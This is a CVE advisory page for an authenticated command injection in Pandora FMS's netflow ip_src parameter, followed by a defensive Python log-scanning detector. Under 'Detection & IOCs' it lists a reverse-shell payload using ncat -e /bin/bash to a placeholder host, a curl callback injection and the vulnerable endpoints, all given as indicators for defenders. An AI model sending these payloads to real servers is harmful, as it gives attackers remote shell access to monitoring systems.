CVE-2019-20224
published 2020-01-09

Priority: P2 · 73
Severity: high (CVSS 3.1 base score 8.8)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit available
EPSS: 50.62% (98.8th percentile)

Description
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742.

Affected (2 ranges)

Vendor   Product       Version range   Fixed in
artica   pandora_fms   (not shown)     (not shown)
artica   pandora_fms   (not shown)     (not shown)

Detection & IOCs (extracted from sources)

url: /pandora_console/index.php?login=1
url: /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0
command: ";ncat -e /bin/bash {ip} {port} #
command: ip_src=%22%3Bcurl+{{interactsh-url}}+%23
path: functions_netflow.php
  • Monitor POST requests to /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view whose ip_src parameter contains shell metacharacters (e.g. ", ;, #); ip_src is the injection point for OS command execution.
  • Shodan/FOFA/Google dorks can identify exposed Pandora FMS instances: search for the HTTP title 'pandora fms'.
  • The exploit uses a two-step HTTP flow: first a POST login to /pandora_console/index.php?login=1, then a POST to the netflow live view endpoint with the malicious ip_src payload. Correlate these two sequential requests from the same source IP.
  • The draw_button=Draw POST parameter must be present alongside the malicious ip_src value; filter for POST bodies containing both 'draw_button=Draw' and shell metacharacters in 'ip_src'.
  • Outbound ncat/curl connections spawned from the Pandora FMS process (e.g. PHP) may indicate successful exploitation; monitor for child processes of the web server executing network tools such as ncat or curl.
  • Exploitation requires valid authenticated credentials; unauthenticated exploitation is not possible. The vulnerability is in the netflow_get_stats function within functions_netflow.php.
  • The vulnerability is fixed in Pandora FMS 7.0 NG 742; instances running versions prior to 742 are affected.
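The detection guidance above (POST to the nf_live_view endpoint, draw_button=Draw present, shell metacharacters in ip_src, correlated with a preceding login POST from the same source) can be turned into a small log-analysis routine. The following is an added example, not code from the CVE record or from Pandora FMS; the request records are constructed sample data, the field names (ts, src, method, url, body) and the 300-second correlation window are assumptions, and the metacharacter set is the one a reviewer would look for in a value that should only ever be an IP address.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters that have no business in an IP address but are meaningful to a shell.
# Assumed set; widen it to match your own web-application firewall rules.
SHELL_META = re.compile(r"""[;|&`$"'#\n]|\$\(""")

# Constructed sample request log (assumed schema). One session logs in and then
# sends a metacharacter payload; another session uses the endpoint legitimately.
NETFLOW_URL = "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0"
SAMPLE_REQUESTS = [
    {"ts": 100, "src": "10.0.0.5", "method": "POST",
     "url": "/pandora_console/index.php?login=1",
     "body": "nick=admin&pass=REDACTED&login_button=Login"},
    {"ts": 104, "src": "10.0.0.5", "method": "POST", "url": NETFLOW_URL,
     "body": "ip_src=%22%3Bid+%23&draw_button=Draw"},          # decodes to ";id #
    {"ts": 120, "src": "10.0.0.9", "method": "POST", "url": NETFLOW_URL,
     "body": "ip_src=192.0.2.10&draw_button=Draw"},             # benign lookup
    {"ts": 121, "src": "10.0.0.9", "method": "GET", "url": NETFLOW_URL, "body": ""},
]


def is_login_request(url: str) -> bool:
    """True for the Pandora console login endpoint (index.php?login=1)."""
    parts = urlsplit(url)
    return parts.path.endswith("/index.php") and parse_qs(parts.query).get("login", [""])[0] == "1"


def is_netflow_live_view(url: str) -> bool:
    """True when sec2 selects the vulnerable netflow live view page."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    return parts.path.endswith("/index.php") and qs.get("sec2", [""])[0] == "operation/netflow/nf_live_view"


def suspicious_ip_src(body: str):
    """Return the decoded ip_src value if the body carries draw_button=Draw and a
    metacharacter-bearing ip_src, else None. parse_qs performs the URL decoding."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("draw_button", [""])[0] != "Draw":
        return None
    for value in params.get("ip_src", []):
        if SHELL_META.search(value):
            return value
    return None


def detect(requests, window: int = 300):
    """Scan request records in time order and emit one alert per suspicious
    nf_live_view POST, noting whether a login POST from the same source preceded it
    within `window` seconds (the two-step flow described in the guidance)."""
    alerts = []
    last_login = {}  # source IP -> timestamp of its most recent login POST
    for rec in sorted(requests, key=lambda r: r["ts"]):
        if rec["method"] != "POST":
            continue
        if is_login_request(rec["url"]):
            last_login[rec["src"]] = rec["ts"]
            continue
        if not is_netflow_live_view(rec["url"]):
            continue
        value = suspicious_ip_src(rec["body"])
        if value is None:
            continue
        login_ts = last_login.get(rec["src"])
        alerts.append({
            "src": rec["src"],
            "ts": rec["ts"],
            "ip_src": value,
            "login_correlated": login_ts is not None and 0 <= rec["ts"] - login_ts <= window,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_REQUESTS):
        print(alert)
```

Because parse_qs decodes the body before the check, percent-encoded payloads such as the %22%3B...%23 form listed under Detection & IOCs are caught the same way as literal ones. A stricter variant is to reject any ip_src that does not parse as an IP address or network at all rather than to enumerate metacharacters; the metacharacter check is shown here because it maps directly onto the guidance on this page.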

CVSS provenance

NVD, CVSS v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C